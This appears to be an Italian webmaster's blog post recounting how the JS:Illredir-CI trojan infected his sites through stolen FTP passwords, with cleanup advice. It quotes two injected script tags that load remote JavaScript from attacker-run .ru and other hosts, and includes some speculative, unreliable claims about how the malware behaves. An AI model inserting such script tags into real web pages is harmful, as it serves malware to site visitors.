La soluzione al virus trojan JS:Illredir-CI [Trj]

Categoria: Notizie di tutto e di più

Cavallo di troja JS:Illredir-CI [Trj] come ripulire il proprio webserver dallo script virus.

Negli ultimi giorni, alcune pagine Online sono state attaccate da un Hacker con indirizzo Web russo. E ci è andato di mezzo anche il nostro sito personale.
Appena si accedeva alla pagina, ecco che Avast l'antivirus, riportava che il sito era infettato dal cavallo di troja JS:Illredir-CI [Trj].
Comunque nessun panico ;) è più semplice di quanto si pensi.
Per esser più preciso erano stati infettati tutti i file che terminano con .js (java script), i file di "Default" (default.aspx o default.cfm) e i file di index del sito.(in altri casi sempre comunque la pagina iniziale anche se fosse chiamata main.html).
Dopo averci cercato di capirne qualcosa ho riscontrato diversi commenti di altre persone che anche loro hanno avuto il Sito infettato dal trojan JS:Illredir-CI [Trj].

Lo script ha usato il programma FTP per un "brute attack" ed è sembrato che attaccasse attraverso indirizzi IP multipli e da diverse parti del mondo
Appena un numero di IP è riuscito a collegarsi, l'attacco degli altri indirizzi IP si è fermato.
Il trojan, ha posto dei codici di java script in tutti i file che ho nominato prima, e tramite le string, si collegava al Sito che veniva usato per l' "attacco".
Ecco per es. uno string che si può trovare in fondo nel codice del sito dopo la tag di chiusura dell' html:
<script type="text/javascript" src="http://www.pantfon.ru:8080/paste.js"></script>
o a volte cammuffato da foto:
<script type="text/javascript" src="http://inc.propertyfiend.com:8080/JPEG.js"></script>
ma sempre e ad ogni modo terminava con .js (Java Script).
Oltretutto in fondo ai javascript, era anche possibile trovare una linea di codice con scritto "document.write".

Ci sono utenti che hanno riportato che il Trojan, ha rubato tutte le parole d'ordine (passwords) che erano salvate nel programma di FTP (in questo caso era filezilla) e automaticamente, infettato anche gli alti acconti salvati nel programma. Ci sono utenti che si sono ritrovati tutti i siti infettati. 

Oltre che ai dati infettati, JS:Illredir-CI [Trj] , spesso salva nel webserver anche un file di "utente" cammuffato con nome a caso, ma sempre di tipo .js
Questo file gli da la possibilità, in caso di pulizia del sito, di ripetere l'attacco, e di infettare nuovamente tutti i file. (cosi mi hanno riferito alcuni Webmaster)

Ho anche notato un altro paio di fatti che trovo molto importanti paragonando due siti infettati. La gerarchia degli ordini sul server, il file di .htaccess  e in che ordine si trovano le pagine iniziali del sito.

Il primo sito corre su un server apache, mentre il secondo ha un window web server.

Nel sito con apache, il trojan ha infettato anche il file di .htaccess, immettendo una stringa di redirect automatica al sito da dove partiva l'attacco, la stessa stringa che si trovava anche nei file di .js e di "default".. Oltre a questo, la pagina index (pagina principale del Domain) si trovava nell'ordine principale del server. Alcuni webmaster mi hanno riportato che da loro anche i file di php erno infettati, ma non nel mio caso.

Nel sito che corre con windows server, che non usa .htaccess, non ha potuto immettere nessun codice maligno per un redirect el file di .htaccess e la pulizia del sito è stata più semplice. Qui la pagina index, non esisteva nell'ordine principale del server, ma era posizionata in alcuni ordini sottostanti.

La differenza che ho notato leggendo i commenti di altri utenti, è che diversamente dalle altre versioni del virus, questa volta i dati infettati non si lasciavano correggere manualmente. Vi capiterà di trovare online come consiglio,  lo scaricare ogni singolo file dal web server che finisca con .js, cercare e cancellare la stringa di javascript immessa dal virus JS:Illredir-CI [Trj]. A me non me lo ha permesso. Mi ha si  lasciato scaricare i file sulla piastra fissa (con allarme di infezione da perte dell'antivirus Avast), ma se poi cercate di aprirlo per pulirlo, ecco che il file vi da errore di apertura ed il file sparisce dal PC o si rende invisibile.

Il mio parere comunque è che è anche probabile che il Trojan è possibile prenderselo scaricando qualche programma e che sia "parcheggiato" sulla piastra fissa del pc, rimanendo innoquo fino al momento che si usa un programma FTP.

Come sono riuscito a pulire i siti?

Innanzitutto: primo passo da fare è cambiare tutte le passwords che usate per entrare in FTP e non salvare la parola d'ordine direttamente nel programma!!!!

Il sito che corre con apache webserver, purtroppo ho dovuto cancellare tutto dalla A alla Z. Nuova installazione del CMS con tutte le configurazioni.
Per fortuna il Trojan non ha infettatto la banca dati, cosichè mi ha dato la possibilità di fare un Backup di tuta la banca dati prima di distruggere tutto.
Qui il problema è che ogni volta che sovvrascrivevo un file di index, con una versione di backup che avevo sulla piastra, mi immetteva automaticamente la stringa di java script in fondo all'html. Ricaricati tutti i file, importato la banca dati ed ecco che tutto funzionava di nuovo. Mi sa che ho fatto prima a far così che a cercare il file che veniva usato come utente per autoriprodursi.

Il sito con windows webserver che non aveva la pagina index nell'ordine principale del webserver, sono riuscito a pulirlo dopo essermi arricchito di commenti e idee nei forum online,  senza dover buttare giù tutta la pagina. Qui è bastato sostituire tutti i file che terminavano con .js con un Backup che avevo sulla piastra fissa, cancellando dal server la versione infettata.

Ecco il mio consiglio per togliervi di mezzo sto maledetto JS:Illredir-CI [Trj] dal web server e sopprattutto dal vostro PC!
Si dico vostro PC, poichè appena viene scaricato un file tramite FTP (dopo che avete visitato un sito infettato), ecco che vi ritrovate infettato anche il pc con vari dati maligni nascosti  nel sistema sotto forma di file con nome .dat, stringe inserite nel registro di window e nell 'autostart del PC.
In caso non avete voglia di cancellare tutto e rimettere su il sito completo, potete leggere qui sotto i miei consigli su come pulire il server dal Trojan. In caso lo vogliate fare, leggete ugualmente i consigli cosichè da non infezionarvi nuovamente subito dopo ;)

Innanzitutto dovreste aver un backup del vostro sito sul disco rigido. Se non avete un backup, e se usate un CMS quali joomla, drupal o altri, allora potete scaricarvi la versione che usate attualmente del Software, e recuperare i File che vi servono da sovvrascrivere.

• Ripeto, cambiate tutte le parole d'ordini ai vostri acconti del programma FTP e collegatevi poi con la password nuova. Non usate parole complete o simili al vostro nome. Usate numeri, lettere maiuscole o minuscole, e non cliccate su "salva password".
• Antivirus e ripulite il vostro PC. Scaricatevi la versione gratis di Malwarebytes su www.malwarebytes.org/ e fate uno scan completo. Scaricatevi anche la versione di Avast!, basta anche la versione gratis personale.
• Fate un Backup della vostra banca dati completa
• Fatevi una lista di dove si trovano tutti i file di index, di javascript e in caso di default.aspx e default.cfm
• viaggiate da cartella a cartella, cancellate tutti i file e sostituiteli con la versione pulita. Se avete la possibilità di lavorare direttamente sul Webserver e cambiare i file, potete aprire tutti i .js e togliere l'ultima linea di codice. Dovrebbe essere qualcosa come "document.write". Ad ogni modo, lo stesso codice che troverete in tutti i file alla fine del documento.
• Se non sapete dove si trovino i file infettati usate Avast! e viaggiate online sulle pagine del vostro sito. Avast! vi darà un allarme ogni volta che incontra un file di infezione e nella finestra che appare troverete il link completo al file posizionato sul vostro server. Bloccate la connessione alla pagina tramite la finestra di Avast! e cercate il file da sostituire tramite FTP.
• Se avete una buona conoscenza dei file sul vostro server, o se non avte molti file di java script o ancora siete ben ordinati ;), vi sarà anche facile notare se per caso vi sono dei file che sono stati aggiunti dall'hacker e che voi non avete mai visto.
• Controllate ogni file di .htaccess se per caso vi sono state aggiunte stringe di redirect e cancellatele. meglio ancora, caricate un file di .htaccess di backup.
• pregate di aver pulito bene e sperate che il giorno dopo sia ancora tutto a posto e non riappaiano file infettati...

Ho anche sentito dire che alcuni utenti pensano di essersi presi il virus attraverso script di php e java script che erano "invecchati" o non attuali.
Se avete un CMS, sempre tenerlo aggiornato e leggervi i report dei Bug sui siti ufficiali. Se avete siti personali programmati manualmente, sempre attenzione agli script che non sono attuali.


Io? Come mi ha beccato il mio sito?
Ho lavorato su un sito che era infettato per veder se riuscivo a trovare il Trojan. Appena ho visitato il sito Online, nonostante abbia tagliato la connesisone, mi ha infilato nei temporanei del Brownser un file infettato. Poi ho scaricato anche alcuni file per veder se riuscivo a togliere le string malefiche sulla piastra fissa. Purtroppo non mi ero informato subito ;) Da quel momento mi si è infettato il PC. Non sapendolo, sono entrato tramite FTP sul mio sito personale ed ecco che appena ho eseguito la connessione, in una paio di secondi tutti i link avevano un redirect ad una pagina "rumena" www.......ru:8080..... E da quel momento iniziarono gli allarmi di infezione di Avwast!
Entrando nel Backend del CMS, tutti i link che avrebbero dovuto portare alla manutenzione, ai cambiamenti di testi, all'inserzione di fotografie, avevano un redirect al sito rumeno e non ti davano la possibilità di cambiar nulla.

Cosa dire di altro... non è valsa la pena prendersela. In questo modo mi sono finalmente installato l'ultima versione del CMS Typo3 e funziona tutto a meraviglia. Se avessi fatto un update sono sicuro che ci avrei speso molto più di tempo e forse non sarebbe andato tutto cosi liscio ;)

comunque... se non siamo noi ad andarli a prendere sotto casa, ci pensarà senz'altro qualcun altro.
Il sito che veniva usato per "attacco" è gia stato segnalato e bloccato.